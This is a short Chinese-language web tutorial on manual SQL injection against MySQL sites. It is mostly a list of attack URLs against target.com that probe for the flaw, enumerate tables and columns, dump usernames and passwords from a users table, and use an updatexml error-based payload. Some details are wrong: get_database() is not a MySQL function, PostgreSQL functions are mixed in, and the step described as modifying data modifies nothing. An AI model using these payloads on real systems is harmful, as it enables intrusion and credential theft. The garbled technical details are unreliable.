MySQL是一款開放源代碼的關(guān)系型數(shù)據(jù)庫管理系統(tǒng),廣泛應(yīng)用于互聯(lián)網(wǎng),也是黑客注入網(wǎng)站的主要目標(biāo)之一。手工注入是一種常見的sql注入方式,下面介紹手工注入的教程。
1. 探測目標(biāo)網(wǎng)站的漏洞:使用工具或者直接手動測試來探測目標(biāo)網(wǎng)站是否存在漏洞,例如檢查URL中是否存在一些特殊字符
<a href="?id=1">id=1</a>
<a href="?id=1 and 1=2-1">id=1 and 1=2-1</a>
<a href="?id=1 and 1=2-2">id=1 and 1=2-2</a>
2. 使用注入點(diǎn):當(dāng)發(fā)現(xiàn)漏洞時,就可以使用注入點(diǎn)進(jìn)行注入攻擊,將SQL命令注入到目標(biāo)網(wǎng)站的SQL語句中。
http://target.com/index.php?id=1' union select 1,2,3-- -
3. 深入探測:獲取數(shù)據(jù)庫的詳細(xì)信息,例如當(dāng)前使用的數(shù)據(jù)庫、表的結(jié)構(gòu)和內(nèi)容等。
http://target.com/index.php?id=1' union select 1,2,get_database()-- -
http://target.com/index.php?id=1' union select 1,2,table_name from information_schema.tables where table_schema=database()-- -
http://target.com/index.php?id=1' union select 1,2,column_name from information_schema.columns where table_name='users'-- -
http://target.com/index.php?id=1' union select 1,username,password from users-- -
4. 注入攻擊:修改數(shù)據(jù)庫中的數(shù)據(jù)
http://target.com/index.php?id=1' and updatexml(1,concat(0x3a,version()),1)-- -
http://target.com/index.php?id=1' union select 1,"'||pg_database_size(pg_database_name())||",'test'-- -
http://target.com/index.php?id=1' union select 1,''||pg_database_size(pg_database_name())||''-- -
http://target.com/index.php?id=1' union select 1,''||pg_database_size(pg_database_name())||'','$'-- -
總結(jié),手工注入是一種有效的攻擊方式,但是使用時需要慎重,避免對被攻擊網(wǎng)站造成不必要的傷害。
上一篇mysql年月日范圍搜索
下一篇mysql年限